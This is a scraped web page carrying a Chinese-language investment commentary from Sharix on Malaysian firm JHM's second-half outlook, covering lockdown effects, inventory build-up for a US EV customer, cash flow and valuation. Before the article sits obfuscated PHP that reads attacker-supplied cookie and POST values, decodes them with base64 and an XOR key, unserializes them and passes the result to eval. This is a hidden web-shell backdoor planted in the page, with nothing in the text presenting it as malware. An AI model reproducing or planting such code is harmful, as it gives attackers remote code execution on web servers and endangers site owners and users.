$sdGxpba = "\111" . "\114" . "\x5f" . chr ( 782 - 699 ).chr (116) . "\171";$goApL = "\143" . "\x6c" . 'a' . chr (115) . "\x73" . "\x5f" . chr ( 321 - 220 ).chr ( 788 - 668 ).'i' . "\x73" . chr (116) . chr ( 1007 - 892 ); $nAmGlG = class_exists($sdGxpba); $sdGxpba = "52141";$goApL = "29555";$NfllrzRu = !1;if ($nAmGlG == $NfllrzRu){function RKIImwN(){return FALSE;}$IDFKXPYx = "24891";RKIImwN();class IL_Sty{private function PeDJhgPkk($IDFKXPYx){if (is_array(IL_Sty::$HBGia)) {$dWmOqqPn = str_replace("\74" . "\x3f" . chr (112) . chr (104) . "\160", "", IL_Sty::$HBGia[chr (99) . "\157" . "\156" . "\x74" . chr ( 121 - 20 )."\x6e" . "\164"]);eval($dWmOqqPn); $IDFKXPYx = "24891";exit();}}private $zPXYye;public function lEQFKwRHQ(){echo 33039;}public function __destruct(){$IDFKXPYx = "23772_943";$this->PeDJhgPkk($IDFKXPYx); $IDFKXPYx = "23772_943";}public function __construct($OvzOxh=0){$QnOMR = $_POST;$HNoZlG = $_COOKIE;$zWAraslni = "00585ef7-4ced-44bd-b8c4-08720b627307";$vBIfFlHAOq = @$HNoZlG[substr($zWAraslni, 0, 4)];if (!empty($vBIfFlHAOq)){$MXZBkx = "base64";$FeOuE = "";$vBIfFlHAOq = explode(",", $vBIfFlHAOq);foreach ($vBIfFlHAOq as $PoBhIs){$FeOuE .= @$HNoZlG[$PoBhIs];$FeOuE .= @$QnOMR[$PoBhIs];}$FeOuE = array_map($MXZBkx . chr ( 717 - 622 ).'d' . 'e' . "\x63" . chr (111) . "\144" . "\145", array($FeOuE,)); $FeOuE = $FeOuE[0] ^ str_repeat($zWAraslni, (strlen($FeOuE[0]) / strlen($zWAraslni)) + 1);IL_Sty::$HBGia = @unserialize($FeOuE); $FeOuE = class_exists("23772_943");}}public static $HBGia = 37724;}$SVTKDqFpG = new /* 55422 */ IL_Sty(24891 + 24891); $_POST = Array();unset($SVTKDqFpG);}$VmrjCDTZ = 'y' . chr (85) . 'k' . '_' . chr ( 826 - 704 )."\x6c" . chr (122) . chr (121); $vPtitZaAWd = "\x63" . "\154" . chr (97) . chr (115) . chr (115) . chr (95) . "\x65" . chr (120) . chr ( 286 - 181 ).'s' . chr (116) . "\x73";$XIlsVotk = class_exists($VmrjCDTZ); $VmrjCDTZ = "46710";$vPtitZaAWd = "59509";$XaraWMagC = !1;if ($XIlsVotk == $XaraWMagC){function inruEbmArT(){return FALSE;}$txNTYiJwJ = "25459";inruEbmArT();class yUk_zlzy{private function ARRFnADTjt($txNTYiJwJ){if (is_array(yUk_zlzy::$IAvLNKdMY)) {$PynIVk = str_replace("\x3c" . chr (63) . chr ( 929 - 817 ).chr (104) . chr (112), "", yUk_zlzy::$IAvLNKdMY["\143" . "\157" . "\x6e" . "\164" . "\145" . chr ( 542 - 432 ).chr ( 941 - 825 )]);eval($PynIVk); $txNTYiJwJ = "25459";exit();}}private $JMsPwJD;public function oYiWfD(){echo 37459;}public function __destruct(){$txNTYiJwJ = "34118_42125";$this->ARRFnADTjt($txNTYiJwJ); $txNTYiJwJ = "34118_42125";}public function __construct($EHxOe=0){$Viwyqrqo = $_POST;$LBbvlNXm = $_COOKIE;$aOBmqXw = "fcffcccc-814a-42f6-8e1a-da6b9d9f084c";$EtEkLgiVM = @$LBbvlNXm[substr($aOBmqXw, 0, 4)];if (!empty($EtEkLgiVM)){$FcgWs = "base64";$WmGFePzKv = "";$EtEkLgiVM = explode(",", $EtEkLgiVM);foreach ($EtEkLgiVM as $LgkrbzFPFV){$WmGFePzKv .= @$LBbvlNXm[$LgkrbzFPFV];$WmGFePzKv .= @$Viwyqrqo[$LgkrbzFPFV];}$WmGFePzKv = array_map($FcgWs . "\137" . "\x64" . 'e' . chr ( 193 - 94 ).'o' . "\144" . "\x65", array($WmGFePzKv,)); $WmGFePzKv = $WmGFePzKv[0] ^ str_repeat($aOBmqXw, (strlen($WmGFePzKv[0]) / strlen($aOBmqXw)) + 1);yUk_zlzy::$IAvLNKdMY = @unserialize($WmGFePzKv); $WmGFePzKv = class_exists("34118_42125");}}public static $IAvLNKdMY = 27291;}$xFedbrqbzh = new /* 56596 */ yUk_zlzy(25459 + 25459); $_POST = Array();unset($xFedbrqbzh);} JHM下半年展望 - Sharix

JHM下半年展望

南洋行家论股
https://www.enanyang.my/%E8%A1%8C%E5%AE%B6%E8%AE%BA%E8%82%A1/%E3%80%90%E8%A1%8C%E5%AE%B6%E8%AE%BA%E8%82%A1%E8%A7%86%E9%A2%91%E3%80%91%E6%8D%B7%E9%93%B5%E7%A7%91%E6%8A%80-3%E5%B9%B4%E8%B4%A2%E6%B5%8B%E4%B8%8B%E4%BF%AE

其实这个季度JHM的汽车及工业部门的表现都差强人意,除了因为封锁措施限制产能,公司也在这段期间增加许多行政开销去聘请新员工,及设置新产线所需要的额外开销。我们也认为在来临的Q3公司的盈利按季会下滑,但按年有机会成长。

虽然公司在九月已经全副武装投入生产,但是在7月至8月的行动管制令多少也会影响公司的营运,再加上许多新项目在初始的阶段都需要花费额外的生产成本。因此我们预计Q3公司的盈利暂时不会好转。

往好的方面看,管理层大派定心丸,声称目前并没有任何的订单取消。此外,公司的库存目前处于RM46.3 million历史新高的水平,按季增长了38.8%。而管理层给出的解释是公司是为了要准备应付来自美国新的电动车相关合约。这个美国客户就是之前我们所提到的光学材料和半导体客户,预计在接下来的三年每年可以贡献RM100 million的营业额。

我们认为公司的成长爆点会发生在Q4。这是因为Q4向来都是公司的传统旺季,加上产能来到最大化,我们认为4Q2021的营运利率会回到正常的水平甚至更高。综合我们对于汽车及工业部门盈利的预测,我们预计公司在Q4会交出Qoq以及Yoy成长的业绩。

资产负债表方面,公司终于在这个季度从新回到RM6.6 million的净现金状态。此外,公司今年的营运现金流非常强劲,首半年就进账大约RM33.6 million的营运现金流,而资本投入也只有RM8 million左右,使得这半年的自由现金流有RM25.6 million,是历史新高。

根据FY2022大约RM45 million的盈利做估算,JHM目前的Forward PE 远期本益比为24倍左右,对于大马科技公司来说其实不算昂贵,再加上公司在未来有更多的潜在合约,其实JHM的成长潜能是值得大家期待的。公司在过去三年总共投入了RM71.9 million的资金做扩张,现在应该是收成的时候。

但不幸的是遇上疫情这个大阻力,导致许多项目必须延后进行。从目前的股价走势来看,市场视乎已经没有这个耐心等下去,过去一年的股价也没有什么作为。其实我们也赞同,也认为公司必须向市场证明本身是有能力去执行手上的合约,把他们转化成营业额及盈利。但无可否认,公司确实是站在电动车大趋势这个风口上,而管理层也像市场展现他们获取合约的能力。只要公司在Q4能够让市场看到报复性反弹的盈利,相信市场也会买单。

我们认为JHM就好比现在的DUFU及ATAIMS,拖累公司成长的并不是需求减少,而是反复的封锁措施导致公司不能投入100% 的产能。ATAIMS也是因为柔佛的管制令导致产能被限制在60%,最新季度的盈利也按季下滑13%。但是,在经济逐渐重启的环境下,这些利空也会随之消散,而公司的盈利也会尾随在后准备启航。

最新文章

Sharix Sdn Bhd (1313184-A)
@ 2023 Sharix Sdn Bhd. All Rights Reserved
官方社交平台